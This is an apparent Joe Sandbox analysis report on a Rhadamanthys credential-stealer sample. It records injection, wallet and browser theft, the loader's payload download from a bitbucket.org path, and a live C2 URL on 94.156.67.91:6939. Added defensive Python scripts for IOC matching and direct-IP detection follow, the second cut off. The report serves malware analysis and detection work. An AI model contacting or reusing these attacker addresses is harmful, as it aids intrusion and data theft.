Windows Analysis Report
nF54KOU30R.exe

Overview

General Information

Sample name: nF54KOU30R.exe
(file extension changed from none to exe because the original file name is a hash value)
Original sample name: 75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
Analysis ID: 1446953
MD5: ea37157ee7ab8afb57a0f8e09afc8bec
SHA1: adb8dd210e87687ce11781f3003aaadff9698dcc
SHA256: 75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Dllhost Internet Connection
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies, it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection

Source: nF54KOU30R.exe Avira: detected
Source: nF54KOU30R.exe ReversingLabs: Detection: 57%
Source: nF54KOU30R.exe Virustotal: Detection: 60%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: nF54KOU30R.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574FF7C CryptUnprotectData, 15_3_00007DF4E574FF7C
Source: nF54KOU30R.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: nF54KOU30R.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2. source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb$I` source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdb source: wmplayer.exe, wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758E20 GetLogicalDriveStringsW, 15_3_00007DF4E5758E20
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 15_3_00007DF4E575BFA1
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 15_2_000001F0D53B0511
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 4x nop then dec esp 16_2_0000020343285641

Networking

Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49737
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49738
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49740
Source: global traffic TCP traffic: 192.168.2.4:49737 -> 94.156.67.91:6939
Source: Joe Sandbox View IP Address: 104.192.141.1
Source: Joe Sandbox View ASN Name: TERASYST-ASBG
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32 (2 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91 (47 connections)
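The "TCP traffic detected without corresponding DNS query" signature above, which fired 47 times for 94.156.67.91, is a heuristic that is easy to reproduce from your own telemetry: a destination IP is suspicious when no DNS answer returned it shortly before the connection was opened. The script below is an added example written for this page, not Joe Sandbox's implementation. The DNS answers and connection records are constructed (Zeek dns.log and Sysmon Event ID 3 style fields) and the allowlist is an assumption; the IPs are the ones this report lists.

```python
"""Reproduce the 'TCP traffic without corresponding DNS query' heuristic over
DNS answers and connection records.  Added example for this page, not Joe
Sandbox code; the records and the allowlist are constructed / assumed."""
from collections import Counter, defaultdict

# Constructed DNS answers (Zeek dns.log style): (ts, query, answer_ip).
DNS_ANSWERS = [
    (100.0, "bitbucket.org", "104.192.141.1"),
    (101.0, "www.msftconnecttest.com", "13.107.4.52"),
]

# Constructed TCP connections (Sysmon Event ID 3 style): (ts, src, dst, dport, image).
CONNECTIONS = [
    (99.0,  "192.168.2.4", "13.107.4.52",    80,   "svchost.exe"),     # answer only arrives at 101.0
    (100.5, "192.168.2.4", "104.192.141.1",  443,  "nF54KOU30R.exe"),  # explained by the lookup at 100.0
    (102.0, "192.168.2.4", "104.46.162.224", 443,  "svchost.exe"),
    (103.0, "192.168.2.4", "94.156.67.91",   6939, "OpenWith.exe"),
    (104.0, "192.168.2.4", "94.156.67.91",   443,  "OpenWith.exe"),
]

# Destinations an organisation has baselined as legitimately contacted by IP.
# Assumed for illustration only: the report lists 104.46.162.224 as a direct
# connection too but does not say what it is; build this from your own baseline.
ALLOWLIST = frozenset({"104.46.162.224"})


def direct_ip_connections(dns_answers, connections, window=3600.0, allow=frozenset()):
    """Return (dst, dport, image) for every connection whose destination IP was
    not returned by a DNS answer in the `window` seconds before it.  A DNS
    answer that arrives after the connection does not explain it, so the
    timestamps are compared rather than plain set membership."""
    answers = defaultdict(list)                 # ip -> timestamps at which it was returned
    for ts, _query, ip in dns_answers:
        answers[ip].append(ts)
    flagged = []
    for ts, _src, dst, dport, image in sorted(connections):
        if dst in allow:
            continue
        explained = any(ts - window <= a <= ts for a in answers.get(dst, ()))
        if not explained:
            flagged.append((dst, dport, image))
    return flagged


def summarize(flagged, standard_ports=frozenset({80, 443})):
    """Collapse repeated hits into one row per (dst, dport, image) with a count
    and mark non-standard ports; this is what turns the 47 identical report
    lines for 94.156.67.91 into one actionable finding."""
    counts = Counter(flagged)
    return [
        {"dst": dst, "dport": dport, "image": image, "count": n,
         "non_standard_port": dport not in standard_ports}
        for (dst, dport, image), n in sorted(counts.items())
    ]


if __name__ == "__main__":
    for row in summarize(direct_ip_connections(DNS_ANSWERS, CONNECTIONS, allow=ALLOWLIST)):
        print(row)
```

Two caveats carry over from the report itself. The signature also fired for 104.46.162.224 and 173.222.162.32, which the sandbox does not attribute to the sample; Windows background services routinely contact hard-coded endpoints, so without an allowlist built from baselining this check is noisy. And the ordering matters: a lookup that resolves the IP after the connection (the 13.107.4.52 row) must still count as a hit, otherwise a client that connects first and resolves later slips through.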
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57821BC WSARecv, 15_3_00007DF4E57821BC
Source: global traffic HTTP traffic detected: GET /exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: dialer.exe, 00000005.00000002.1994131096.000000000259C000.00000004.00000010.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1998374665.0000000004F50000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1996018655.0000000004B28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000F.00000003.2319739898.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256043552.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146388100.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321330995.000001F0D737C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321549596.000001F0D7426000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2265610834.000001F0D73C9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321675274.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2080480545.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147044132.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079654830.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081757953.000001F0D745A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146780180.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081590039.000001F0D743B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075439224.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256879858.000001F0D73C9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075836836.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n
Source: OpenWith.exe, 0000000F.00000003.2319739898.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256043552.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146388100.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321675274.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2080480545.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147044132.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079654830.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081757953.000001F0D745A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146780180.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081590039.000001F0D743B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075439224.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075836836.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2077245236.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2116540453.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2108797615.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2077757038.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075206262.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147260095.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079158440.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n:
Source: dialer.exe, 00000005.00000002.1998374665.0000000004F50000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1996018655.0000000004B28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0nkernelbasentdllkernel32GetProcessMitigati
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/0
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAA
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d136azpfpnge1l.cloudfront.net/;
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d301sr5gafysq2.cloudfront.net/
Source: OpenWith.exe, 0000000F.00000003.2080999215.000001F0D7613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: OpenWith.exe, 0000000F.00000003.2080999215.000001F0D7613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: OpenWith.exe, 0000000F.00000003.2076605269.000001F0D7644000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: OpenWith.exe, 0000000F.00000003.2077419633.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5a
Source: OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73A6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076758664.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: OpenWith.exe, 0000000F.00000003.2076758664.000001F0D7394000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17A66
Source: OpenWith.exe, 0000000F.00000003.2076605269.000001F0D7644000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: OpenWith.exe, 0000000F.00000002.2321311463.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2230586542.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081434576.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2265431962.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2107281075.000001F0D7374000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2109142807.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2116414121.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256683034.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP
Source: OpenWith.exe, 0000000F.00000003.2076758664.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website~e
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
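The Networking evidence above yields a small, concrete IOC set: the sample's hashes, the bitbucket.org raw path the loader fetches, the C2 socket 94.156.67.91:6939 together with the URL recovered from OpenWith.exe memory, and two JA3 fingerprints. The script below is an added example for this page, not Joe Sandbox's exporter. It parses signature lines copied verbatim from this report into a structured IOC set and then matches that set against constructed, Zeek-like log lines; the log schema, the regular expressions and the confidence levels are assumptions, and the Snort alert text is used only for the socket it names, since the ETPRO rule body itself is not on the page.

```python
"""Extract IOCs from Joe Sandbox signature lines and match them against log
lines.  Added example, not Joe Sandbox code: the signature line formats are
the report's own, the log schema and regexes are assumptions."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: signature lines copied verbatim from the report above.
REPORT_LINES = """\
MD5: ea37157ee7ab8afb57a0f8e09afc8bec
SHA1: adb8dd210e87687ce11781f3003aaadff9698dcc
SHA256: 75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49737
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
Source: global traffic HTTP traffic detected: GET /exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
Source: OpenWith.exe String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n
Source: OpenWith.exe String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n:
"""

HASH_RE = re.compile(r"^(?:MD5|SHA1|SHA256): ([0-9a-f]{32,64})$")
SNORT_RE = re.compile(r"Snort IDS: \d+ .*? (\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> ")
JA3_RE = re.compile(r"JA3 fingerprint: ([0-9a-f]{32})\b")
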